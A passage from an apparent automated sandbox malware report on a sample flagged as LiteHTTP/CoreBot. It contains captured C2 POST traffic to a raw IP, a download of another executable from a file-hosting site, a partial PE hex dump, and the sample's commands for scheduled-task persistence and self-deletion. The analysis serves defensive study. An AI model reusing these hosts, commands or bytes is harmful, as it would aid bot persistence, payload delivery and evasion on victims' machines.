                          Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
                          Jan 15, 2025 18:11:03.143078089 CET25INHTTP/1.1 100 Continue
                          Jan 15, 2025 18:11:03.276634932 CET309INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Wed, 15 Jan 2025 17:11:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 38 30 0d 0a 38 33 31 5a 48 63 76 38 4c 51 57 66 74 74 41 39 49 53 33 30 33 59 4c 76 79 54 77 4e 34 73 62 65 54 59 36 43 6b 44 79 77 45 77 4b 71 61 4f 37 47 61 4b 74 48 78 48 38 4d 6b 45 4a 61 6e 41 33 4d 4e 6d 72 7a 75 46 74 4f 75 5a 61 44 4b 42 65 76 47 32 2f 69 62 50 2b 45 43 39 71 35 48 66 63 34 69 71 7a 6b 47 30 4b 6e 53 51 47 54 36 54 37 70 49 6c 47 63 50 50 36 42 72 43 75 76 74 6a 64 4f 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 80831ZHcv8LQWfttA9IS303YLvyTwN4sbeTY6CkDywEwKqaO7GaKtHxH8MkEJanA3MNmrzuFtOuZaDKBevG2/ibP+EC9q5Hfc4iqzkG0KnSQGT6T7pIlGcPP6BrCuvtjdO0
                          Jan 15, 2025 18:11:05.520499945 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                          Host: 87.120.126.5
                          Content-Length: 423
                          Expect: 100-continue
                          Jan 15, 2025 18:11:05.693058014 CET25INHTTP/1.1 100 Continue
                          Jan 15, 2025 18:11:05.693289995 CET423OUTData Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
                          Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
                          Jan 15, 2025 18:11:05.949556112 CET175INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Wed, 15 Jan 2025 17:11:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0
                          Jan 15, 2025 18:11:05.950274944 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                          Host: 87.120.126.5
                          Content-Length: 396
                          Expect: 100-continue
                          Jan 15, 2025 18:11:06.122931957 CET25INHTTP/1.1 100 Continue
                          Jan 15, 2025 18:11:06.123167038 CET396OUTData Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
                          Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
                          Jan 15, 2025 18:11:06.301155090 CET175INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Wed, 15 Jan 2025 17:11:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0
                          Jan 15, 2025 18:11:06.689896107 CET175INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Wed, 15 Jan 2025 17:11:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.959240104.21.21.16801380C:\Users\user\Desktop\random.exe
                          TimestampBytes transferredDirectionData
                          Jan 15, 2025 18:11:03.437057972 CET84OUTGET /dl/19480319/anubis.exe HTTP/1.1
                          Host: tmpfiles.org
                          Connection: Keep-Alive
                          Jan 15, 2025 18:11:04.169414997 CET1042INHTTP/1.1 301 Moved Permanently
                          Date: Wed, 15 Jan 2025 17:11:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Location: https://tmpfiles.org/dl/19480319/anubis.exe
                          Cache-Control: max-age=14400
                          CF-Cache-Status: MISS
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8sRvczVZSVbyc%2BfvtCOIf97Fn%2Fh7DioR2KSt%2F7wzY23yC74vvnDeJCKiakD8B8qAGhH1E514bLbvkKbD6kDlfIzXLGO9VYJ6qDughx6JYUhFm44%2FiF7EMVnxuTk1vOk%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 90277b993f887144-YUL
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=17576&min_rtt=17576&rtt_var=8788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                          Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.959241104.21.21.164431380C:\Users\user\Desktop\random.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 17:11:04 UTC84OUTGET /dl/19480319/anubis.exe HTTP/1.1
                          Host: tmpfiles.org
                          Connection: Keep-Alive
                          2025-01-15 17:11:05 UTC1140INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 17:11:05 GMT
                          Content-Type: application/x-dosexec
                          Content-Length: 38400
                          Connection: close
                          Content-Disposition: inline; filename=anubis.exe
                          Cache-Control: no-cache, private
                          CF-Cache-Status: BYPASS
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVhZzc3ZzU3d1NTcHFjUmhQUWRXWmc9PSIsInZhbHVlIjoiTnFGMVhUeS9tNUZ3ME1EUFhvMElxTjYvSkoxcCt4cHNyWlI3Y1VESWtTcWo1MFhFUmd2TlMySDRSZWp3dVBueEdoNGZ2WnMwQWlUUHFLN3p5UUx6Q1VvT3dOZlQ1eG9ZcTBTdEliS0xBejh6MHNsV0krNkVEcUs0UUFkb0pQTEMiLCJtYWMiOiI1YjE0MWRmZGQ1MzJmNThmMTE2NDUzNTRmMTU3NzIwZDUzNjcyNzAyNTg5ZjMxYzU1YTI5ZTQzOTEwZDIxYzdkIn0%3D; expires=Wed, 15-Jan-2025 19:11:05 GMT; Max-Age=7200; path=/; samesite=lax
                          Set-Cookie: tmpfiles_session=eyJpdiI6IkhUcTJCWXlsZmhXbC9lRy9lekVXTkE9PSIsInZhbHVlIjoiQUUrQzZHSUhERThReWxJczlGek9IOWFPdVRTZ05ndkluWXJCSmlBelpBNmNROUxRUXM2N3VaOFpsM0V4SVFnZzhRaUhOdkdyVHdKL2g2U0oyY3dVY1FqeXJYZDMzc2pCYjFFcHl3NzFhUWRjSkV1SFpKVitoUVNrTHlZRSs1elYiLCJtYWMiOiJiODlmZDNkZTI3ZGVmM2YxODEwMDc3NDMwNDc5Mjc0NGJjMWJkMjY4ZWYzMTgwNzZjMjhkYTg1NGExZGI1MmNlIn0%3D; expires=Wed, 15-Jan-2025 19:11:05 GMT; Max-Age=7200; path=/; httponly; samesite=lax
                          Accept-Ranges: bytes
                          2025-01-15 17:11:05 UTC615INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 30 54 5a 6b 77 78 38 42 4b 77 54 4c 77 54 52 41 54 38 45 44 4d 4f 59 75 56 4b 25 32 42 47 59 79 68 6f 77 53 4e 53 72 68 6d 59 32 4e 4c 4e 54 64 46 61 49 54 49 6d 46 36 62 37 38 25 32 46 47 4a 78 44 54 66 34 71 62 72 44 66 77 49 72 31 54 53 73 5a 62 4b 53 55 6c 71 65 47 65 4c 33 64 30 67 38 69 58 48 4a 66 47 52 65 73 46 6f 42 72 62 5a 37 6a 6c 76 68 52 45 38 45 42 4b 5a 62 75 56 74 33 4c 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0TZkwx8BKwTLwTRAT8EDMOYuVK%2BGYyhowSNSrhmY2NLNTdFaITImF6b78%2FGJxDTf4qbrDfwIr1TSsZbKSUlqeGeL3d0g8iXHJfGResFoBrbZ7jlvhRE8EBKZbuVt3Lo%3D"}],"group":"cf-nel","max_age":604800}NEL
                          2025-01-15 17:11:05 UTC1369INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 e2 87 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8a 00 00 00 0a 00 00 00 00 00 00 8e a8 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELg0 @ `
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 07 6f 2d 00 00 0a 72 0f 01 00 70 6f 2e 00 00 0a 00 07 6f 2d 00 00 0a 72 25 01 00 70 02 72 35 01 00 70 28 25 00 00 0a 6f 2f 00 00 0a 00 07 6f 2d 00 00 0a 17 6f 30 00 00 0a 00 07 6f 2d 00 00 0a 16 6f 31 00 00 0a 00 07 6f 32 00 00 0a 26 07 6f 33 00 00 0a 00 00 de 0b 07 2c 07 07 6f 34 00 00 0a 00 dc 2a 00 00 01 10 00 00 02 00 1d 00 59 76 00 0b 00 00 00 00 1b 30 03 00 6f 00 00 00 04 00 00 11 00 28 35 00 00 0a 0a 00 06 1f 0a 1f 64 28 05 00 00 06 0b 06 20 f4 01 00 00 20 88 13 00 00 28 05 00 00 06 0c 06 07 08 28 05 00 00 06 0d 06 17 1b 28 05 00 00 06 13 04 16 13 05 2b 18 00 09 28 29 00 00 0a 00 06 07 08 28 05 00 00 06 0d 00 11 05 17 58 13 05 11 05 11 04 fe 04 13 06 11 06 2d dc 00 de 0b 06 2c 07 06 6f 34 00 00 0a 00 dc 2a 00 01 10 00 00 02 00 07 00 5c 63 00 0b
                          Data Ascii: o-rpo.o-r%pr5p(%o/o-o0o-o1o2&o3,o4*Yv0o(5d( (((+()(X-,o4*\c
                          2025-01-15 17:11:05 UTC1369INData Raw: 3c 00 00 0a 7d 0c 00 00 04 06 1f 1a 28 3e 00 00 0a 06 7b 0c 00 00 04 28 57 00 00 0a 28 3f 00 00 0a 7d 0d 00 00 04 06 7b 0d 00 00 04 28 58 00 00 0a 16 fe 01 0b 07 2c 15 00 06 7b 0c 00 00 04 06 7b 0d 00 00 04 17 28 59 00 00 0a 00 00 06 fe 06 3c 00 00 06 73 5a 00 00 0a 28 5b 00 00 0a 26 2a 00 00 1b 30 03 00 46 00 00 00 0c 00 00 11 00 00 28 3a 00 00 0a 6f 3b 00 00 0a 6f 3c 00 00 0a 0a 1f 1a 28 3e 00 00 0a 06 28 57 00 00 0a 28 3f 00 00 0a 0b 07 28 58 00 00 0a 16 fe 01 0c 08 2c 0b 00 06 07 17 28 59 00 00 0a 00 00 00 de 05 26 00 00 de 00 2a 00 00 01 10 00 00 00 00 01 00 3f 40 00 05 19 00 00 01 13 30 02 00 10 00 00 00 0d 00 00 11 00 28 0e 00 00 06 0a 06 16 28 0f 00 00 06 26 2a 22 02 28 5c 00 00 0a 00 2a 00 00 00 13 30 01 00 14 00 00 00 0e 00 00 11 02 28 01 00 00
                          Data Ascii: <}(>{(W(?}{(X,{{(Y<sZ([&*0F(:o;o<(>(W(?(X,(Y&*?@0((&*"(\*0(
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 00 0a 6f 2b 00 00 0a 0a 06 72 c3 03 00 70 28 1d 00 00 0a 2d 06 06 14 fe 01 2b 01 17 0b 07 2c 0d 00 28 77 00 00 0a 6f 2b 00 00 0a 0a 00 06 0c 2b 00 08 2a 00 1b 30 03 00 7e 00 00 00 16 00 00 11 00 02 73 78 00 00 0a 0a 73 79 00 00 0a 0b 00 1a 8d 52 00 00 01 0c 16 0d 2b 3f 00 07 08 6f 37 00 00 0a 00 08 16 28 38 00 00 0a 20 ff ff ff 7f 5f 13 04 11 04 72 27 05 00 70 28 7a 00 00 0a 5d 13 05 06 72 27 05 00 70 11 05 28 7b 00 00 0a 6f 7c 00 00 0a 26 00 09 17 58 0d 09 02 fe 04 13 06 11 06 2d b7 00 de 0b 07 2c 07 07 6f 34 00 00 0a 00 dc 06 6f 65 00 00 0a 13 07 2b 00 11 07 2a 00 00 01 10 00 00 02 00 0e 00 58 66 00 0b 00 00 00 00 1b 30 06 00 01 03 00 00 18 00 00 11 00 28 22 00 00 0a 02 28 23 00 00 0a 6f 24 00 00 0a 0a 28 22 00 00 0a 28 22 00 00 0a 03 28 23 00 00 0a
                          Data Ascii: o+rp(-+,(wo++*0~sxsyR+?o7(8 _r'p(z]r'p({o|&X-,o4oe+*Xf0("(#o$("("(#
                          2025-01-15 17:11:05 UTC1369INData Raw: 55 00 00 0a 26 17 13 0a dd 14 02 00 00 00 72 2f 06 00 70 73 8c 00 00 0a 7a 00 73 52 00 00 0a 25 17 6f 30 00 00 0a 00 25 16 6f 31 00 00 0a 00 25 03 6f 2f 00 00 0a 00 13 0b 08 13 0d 11 0d 13 0c 11 0c 72 81 06 00 70 28 1d 00 00 0a 2d 4e 11 0c 72 8b 06 00 70 28 1d 00 00 0a 2d 4e 11 0c 72 95 06 00 70 28 1d 00 00 0a 2d 40 11 0c 72 9f 06 00 70 28 1d 00 00 0a 2d 5a 11 0c 72 a9 06 00 70 28 1d 00 00 0a 2d 74 11 0c 72 b3 06 00 70 28 1d 00 00 0a 3a 8b 00 00 00 38 9a 00 00 00 11 0b 09 6f 2e 00 00 0a 00 38 9d 00 00 00 11 0b 72 bd 06 00 70 6f 2e 00 00 0a 00 11 0b 72 cd 06 00 70 09 72 d7 06 00 70 03 28 67 00 00 0a 6f 2f 00 00 0a 00 2b 75 11 0b 72 dd 06 00 70 6f 2e 00 00 0a 00 11 0b 72 fb 06 00 70 09 72 d7 06 00 70 03 28 67 00 00 0a 6f 2f 00 00 0a 00 2b 4d 11 0b 72 3b 07
                          Data Ascii: U&r/pszsR%o0%o1%o/rp(-Nrp(-Nrp(-@rp(-Zrp(-trp(:8o.8rpo.rprp(go/+urpo.rprp(go/+Mr;
                          2025-01-15 17:11:05 UTC1369INData Raw: 80 07 00 00 04 72 45 09 00 70 80 08 00 00 04 2a 00 00 00 1b 30 04 00 0c 01 00 00 21 00 00 11 00 00 28 22 00 00 0a 03 6f 6c 00 00 0a 0a 02 28 a0 00 00 0a 0b 07 72 49 09 00 70 6f a1 00 00 0a 00 07 72 53 09 00 70 6f a2 00 00 0a 00 07 06 8e 69 6a 6f a3 00 00 0a 00 07 75 40 00 00 01 0c 08 14 fe 03 0d 09 2c 1a 00 08 72 97 09 00 70 6f a4 00 00 0a 00 08 20 98 3a 00 00 6f a5 00 00 0a 00 00 07 6f a6 00 00 0a 13 04 00 11 04 06 16 06 8e 69 6f a7 00 00 0a 00 00 de 0d 11 04 2c 08 11 04 6f 34 00 00 0a 00 dc 07 6f a8 00 00 0a 13 05 11 05 6f a9 00 00 0a 73 aa 00 00 0a 13 06 00 11 06 6f ab 00 00 0a 13 07 de 60 11 06 2c 08 11 06 6f 34 00 00 0a 00 dc 11 05 2c 08 11 05 6f 34 00 00 0a 00 dc 13 08 00 72 d9 09 00 70 11 08 6f 27 00 00 0a 28 28 00 00 0a 28 1e 00 00 0a 00 72 65 00
                          Data Ascii: rEp*0!("ol(rIporSpoijou@,rpo :ooio,o4ooso`,o4,o4rpo'(((re
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 00 06 00 00 de 05 26 00 00 de 00 2a 00 01 10 00 00 00 00 01 00 28 29 00 05 19 00 00 01 1b 30 03 00 17 00 00 00 1d 00 00 11 00 00 16 0a 16 12 00 16 28 33 00 00 06 00 00 de 05 26 00 00 de 00 2a 00 01 10 00 00 00 00 01 00 10 11 00 05 19 00 00 01 2e 73 39 00 00 06 80 09 00 00 04 2a 13 30 02 00 2d 00 00 00 25 00 00 11 73 54 00 00 06 0a 06 28 c5 00 00 0a 7d 21 00 00 04 06 02 7d 22 00 00 04 06 15 7d 20 00 00 04 06 7c 21 00 00 04 12 00 28 06 00 00 2b 2a 00 00 00 1b 30 03 00 82 00 00 00 26 00 00 11 00 2b 7b 00 00 02 7b 0b 00 00 04 28 c7 00 00 0a 8e 16 fe 01 0a 06 2c 51 00 02 7b 0c 00 00 04 28 58 00 00 0a 16 fe 01 0b 07 2c 15 00 02 7b 0d 00 00 04 02 7b 0c 00 00 04 17 28 59 00 00 0a 00 00 73 52 00 00 0a 25 02 7b 0c 00 00 04 6f 2e 00 00 0a 00 25 16 6f 31 00 00 0a
                          Data Ascii: &*()0(3&*.s9*0-%sT(}!}"} |!(+*0&+{{(,Q{(X,{{(YsR%{o.%o1
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 04 12 00 28 0b 00 00 2b 06 7c 40 00 00 04 28 1a 00 00 0a 2a 1b 30 02 00 6c 00 00 00 2d 00 00 11 00 73 d4 00 00 0a 0a 00 1f 26 28 3e 00 00 0a 0b 00 07 28 d5 00 00 0a 0c 16 0d 2b 22 08 09 9a 13 04 00 11 04 73 d6 00 00 0a 6f d7 00 00 0a 13 05 06 11 05 6f d8 00 00 0a 00 00 09 17 58 0d 09 08 8e 69 32 d8 00 de 1d 13 06 00 72 bb 0a 00 70 11 06 6f 27 00 00 0a 28 28 00 00 0a 28 1e 00 00 0a 00 00 de 00 06 13 07 2b 00 11 07 2a 01 10 00 00 00 00 07 00 40 47 00 1d 19 00 00 01 13 30 04 00 67 00 00 00 00 00 00 00 02 73 d4 00 00 0a 25 72 0f 0b 00 70 6f d8 00 00 0a 00 25 72 1f 0b 00 70 6f d8 00 00 0a 00 25 72 31 0b 00 70 6f d8 00 00 0a 00 25 72 4b 0b 00 70 6f d8 00 00 0a 00 25 72 63 0b 00 70 6f d8 00 00 0a 00 25 72 75 0b 00 70 6f d8 00 00 0a 00 25 72 7d 0b 00 70 6f d8
                          Data Ascii: (+|@(*0l-s&(>(+"sooXi2rpo'(((+*@G0gs%rpo%rpo%r1po%rKpo%rcpo%rupo%r}po
                          2025-01-15 17:11:05 UTC1369INData Raw: 04 02 73 59 00 00 06 7d 34 00 00 04 02 7b 34 00 00 04 02 7b 33 00 00 04 7d 28 00 00 04 00 02 7b 34 00 00 04 02 7b 2e 00 00 04 02 7b 34 00 00 04 7b 28 00 00 04 7b 25 00 00 04 72 81 06 00 70 28 28 00 00 0a 28 3f 00 00 0a 7d 27 00 00 04 02 7b 34 00 00 04 fe 06 5a 00 00 06 73 e0 00 00 0a 28 e1 00 00 0a 6f 5d 00 00 0a 0c 12 02 28 c9 00 00 0a 2d 43 02 16 25 0a 7d 2c 00 00 04 02 08 7d 36 00 00 04 02 0d 02 7c 2d 00 00 04 12 02 12 03 28 12 00 00 2b 00 dd e2 00 00 00 02 7b 36 00 00 04 0c 02 7c 36 00 00 04 fe 15 1e 00 00 01 02 15 25 0a 7d 2c 00 00 04 12 02 28 5e 00 00 0a 00 00 02 14 7d 34 00 00 04 02 14 7d 33 00 00 04 02 7c 32 00 00 04 28 d3 00 00 0a 3a f2 fe ff ff de 17 06 16 2f 12 02 7c 32 00 00 04 fe 16 09 00 00 1b 6f 34 00 00 0a 00 dc 02 7c 32 00 00 04 fe 15 09
                          Data Ascii: sY}4{4{3}({4{.{4{({%rp(((?}'{4Zs(o](-C%},}6|-(+{6|6%},(^}4}3|2(:/|2o4|2


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:12:09:59
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0xcf0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:12:10:42
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                          Imagebase:0x5c0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:12:10:42
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:12:10:43
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\random.exe
                          Imagebase:0x8e0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:10
                          Start time:12:10:56
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0x100000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:11
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0x2f0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:12
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Users\user\AppData\Roaming\cEp3d38.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\cEp3d38.exe"
                          Imagebase:0x7ff6fab70000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 21%, ReversingLabs
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:13
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
                          Imagebase:0xc50000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:14
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:15
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\PING.EXE
                          Wow64 process (32bit):true
                          Commandline:ping 1.1.1.1 -n 1 -w 4000
                          Imagebase:0x3c0000
                          File size:18'944 bytes
                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:16.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:12
                            Total number of Limit Nodes:0
